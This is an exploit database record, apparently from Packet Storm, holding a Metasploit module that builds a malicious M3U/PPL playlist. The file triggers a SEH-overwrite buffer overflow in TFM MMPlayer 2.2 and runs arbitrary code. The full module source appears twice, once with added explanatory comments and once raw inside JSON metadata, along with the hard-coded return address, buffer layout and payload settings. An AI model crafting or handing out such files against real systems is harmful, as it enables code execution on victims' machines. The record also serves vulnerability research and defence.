ID PACKETSTORM:113764
Type packetstorm
Reporter RjRjh Hack3r
Modified 2012-06-16T00:00:00
Description
`##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
# Metasploit file-format exploit module for the TFM MMPlayer 2.2 M3U/PPL
# SEH-overwrite buffer overflow described in the 'Description' below.
# Nothing is sent over the network: the module only writes a crafted
# playlist file (via Msf::Exploit::FILEFORMAT) that triggers the bug when
# the player opens it. Useful as a reference for what the malformed file
# looks like (a ~4 KB alphanumeric run followed by an SEH record overwrite).
class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking

  # Supplies file_create and the FILENAME option handling.
  include Msf::Exploit::FILEFORMAT

  # Registers module metadata (name, authorship, references, the single
  # target's return address, payload constraints) and the FILENAME option.
  #
  # @param info [Hash] module info supplied by the framework, merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'TFM MMPlayer (m3u/ppl File) Buffer Overflow',
      'Description' => %q{
This module exploits a buffer overflow in MMPlayer 2.2
The vulnerability is triggered when opening a malformed M3U/PPL file
that contains an overly long string, which results in overwriting a
SEH record, thus allowing arbitrary code execution under the context
of the user.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'RjRjh Hack3r', # Original discovery and exploit
          'Brendan Coles <bcoles[at]gmail.com>' # msf exploit
        ],
      'References' =>
        [
          [ 'OSVDB', '80532' ],
          [ 'BID', '52698' ],
          [ 'EDB', '18656' ], # .m3u
          [ 'EDB', '18657' ] # .ppl
        ],
      'DefaultOptions' =>
        {
          # Payload exits via the exception handler; the auto-run script is a
          # Meterpreter-side convenience and has no effect on the file written.
          'ExitFunction' => 'seh',
          'InitialAutoRunScript' => 'migrate -f'
        },
      'Platform' => 'win',
      'Targets' =>
        [
          # Tested on:
          # Windows XP Pro SP3 - English
          # Windows Vista SP1 - English
          # Windows 7 Home Basic SP0 - English
          # Windows 7 Ultimate SP1 - English
          # Windows Server 2003 Enterprise SP2 - English
          # 'Ret' is the address written into the SEH handler slot by #exploit;
          # it lives in the application binary itself, which is why one entry
          # is listed as universal across the OS versions above.
          [ 'Windows Universal', { 'Ret' => 0x00401390 } ], # p/p/r -> MMPlayer.exe
        ],
      'Payload' =>
        {
          # NOTE(review): presumably the upper bound that keeps the filler
          # length in #exploit (4103 - payload - nops) non-negative — confirm.
          'Size' => 4000,
          # Bytes that would terminate or corrupt a playlist line.
          'BadChars' => "\x00\x0a\x0d",
          'DisableNops' => false
        },
      'Privileged' => false,
      'DisclosureDate' => 'Mar 23 2012',
      'DefaultTarget' => 0
    ))

    # Default output name uses the .ppl extension; the .m3u variant
    # (EDB 18656) shares the same file contents.
    register_options(
      [
        OptString.new('FILENAME', [ true, 'The file name.', 'msf.ppl'])
      ], self.class)
  end

  # Builds the malformed playlist contents and writes them to disk.
  #
  # Buffer layout, in order:
  #   nops (10 B) | payload.encoded | alphanumeric filler | near jmp | nSEH (4 B) | SEH (4 B)
  # The filler is sized so that nops + payload + filler total 4103 bytes;
  # the near jump then covers that distance back to the NOP sled, and the
  # nSEH short jump covers the 7 bytes back to the near jump (per the
  # inline comments kept from the original).
  #
  # @return [void] the file is written as a side effect via file_create
  def exploit
    nops = make_nops(10)
    sc = payload.encoded
    # Filler length depends on the encoded payload size so the overall
    # distance to the jump stays constant.
    offset = Rex::Text.rand_text_alphanumeric(4103 - sc.length - nops.length)
    jmp = Rex::Arch::X86.jmp(-4108) # near jump 4103 bytes
    nseh = Rex::Arch::X86.jmp_short(-7) # jmp back 7 bytes
    # Two random bytes complete the 4-byte nSEH slot.
    nseh << Rex::Text.rand_text_alphanumeric(2)
    # Overwritten SEH handler: the selected target's 'Ret', packed as a
    # 32-bit little-endian value.
    seh = [target.ret].pack('V')

    # `sploit` is the same String object as `nops`, so the appends below
    # mutate nops too; harmless here since nops is not reused.
    sploit = nops
    sploit << sc
    sploit << offset
    sploit << jmp
    sploit << nseh
    sploit << seh

    # write file
    # Writes to the path given by the FILENAME option (FILEFORMAT mixin).
    file_create(sploit)
  end
end
`
{"hash": "f7baa6a821eab2743cd7ed7d50d1764d5efef5094b1c564d62fc9720c6b95ff2", "sourceHref": "https://packetstormsecurity.com/files/download/113764/tfm_mmplayer_m3u_ppl_bof.rb.txt", "title": "TFM MMPlayer (m3u/ppl File) Buffer Overflow", "id": "PACKETSTORM:113764", "published": "2012-06-16T00:00:00", "description": "", "modified": "2012-06-16T00:00:00", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GoodRanking \n \ninclude Msf::Exploit::FILEFORMAT \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'TFM MMPlayer (m3u/ppl File) Buffer Overflow', \n'Description' => %q{ \nThis module exploits a buffer overflow in MMPlayer 2.2 \nThe vulnerability is triggered when opening a malformed M3U/PPL file \nthat contains an overly long string, which results in overwriting a \nSEH record, thus allowing arbitrary code execution under the context \nof the user. 
\n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'RjRjh Hack3r', # Original discovery and exploit \n'Brendan Coles <bcoles[at]gmail.com>' # msf exploit \n], \n'References' => \n[ \n[ 'OSVDB', '80532' ], \n[ 'BID', '52698' ], \n[ 'EDB', '18656' ], # .m3u \n[ 'EDB', '18657' ] # .ppl \n], \n'DefaultOptions' => \n{ \n'ExitFunction' => 'seh', \n'InitialAutoRunScript' => 'migrate -f' \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n# Tested on: \n# Windows XP Pro SP3 - English \n# Windows Vista SP1 - English \n# Windows 7 Home Basic SP0 - English \n# Windows 7 Ultimate SP1 - English \n# Windows Server 2003 Enterprise SP2 - English \n[ 'Windows Universal', { 'Ret' => 0x00401390 } ], # p/p/r -> MMPlayer.exe \n], \n'Payload' => \n{ \n'Size' => 4000, \n'BadChars' => \"\\x00\\x0a\\x0d\", \n'DisableNops' => false \n}, \n'Privileged' => false, \n'DisclosureDate' => 'Mar 23 2012', \n'DefaultTarget' => 0 \n)) \n \nregister_options( \n[ \nOptString.new('FILENAME', [ true, 'The file name.', 'msf.ppl']) \n], self.class) \n \nend \n \ndef exploit \n \nnops = make_nops(10) \nsc = payload.encoded \noffset = Rex::Text.rand_text_alphanumeric(4103 - sc.length - nops.length) \njmp = Rex::Arch::X86.jmp(-4108) # near jump 4103 bytes \nnseh = Rex::Arch::X86.jmp_short(-7) # jmp back 7 bytes \nnseh << Rex::Text.rand_text_alphanumeric(2) \nseh = [target.ret].pack('V') \n \nsploit = nops \nsploit << sc \nsploit << offset \nsploit << jmp \nsploit << nseh \nsploit << seh \n \n# write file \nfile_create(sploit) \n \nend \nend \n \n`\n", "reporter": "RjRjh Hack3r", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "d443c46cc5648daa967ca889cc77279e"}, {"key": "modified", "hash": "07f24ccbbaa87722e9a75dfc7bd3e0e3"}, {"key": "objectVersion", "hash": 
"56765472680401499c79732468ba4340"}, {"key": "published", "hash": "07f24ccbbaa87722e9a75dfc7bd3e0e3"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "dc9bcc7a5d0595d6398f8f2303a1ce57"}, {"key": "sourceData", "hash": "e99ec0752153c780f2620723a31073ff"}, {"key": "sourceHref", "hash": "5605952b5ceebabca6d629e0ea61c214"}, {"key": "title", "hash": "20b983231530b2c3ae12cbc8d9ec3946"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "cvss": {"vector": "NONE", "score": 0.0}, "references": [], "type": "packetstorm", "cvelist": [], "history": [], "bulletinFamily": "exploit", "objectVersion": "1.2", "edition": 1, "href": "https://packetstormsecurity.com/files/113764/TFM-MMPlayer-m3u-ppl-File-Buffer-Overflow.html", "lastseen": "2016-11-03T10:18:47", "viewCount": 0, "enchantments": {"vulnersScore": 4.0}}
{"result": {}}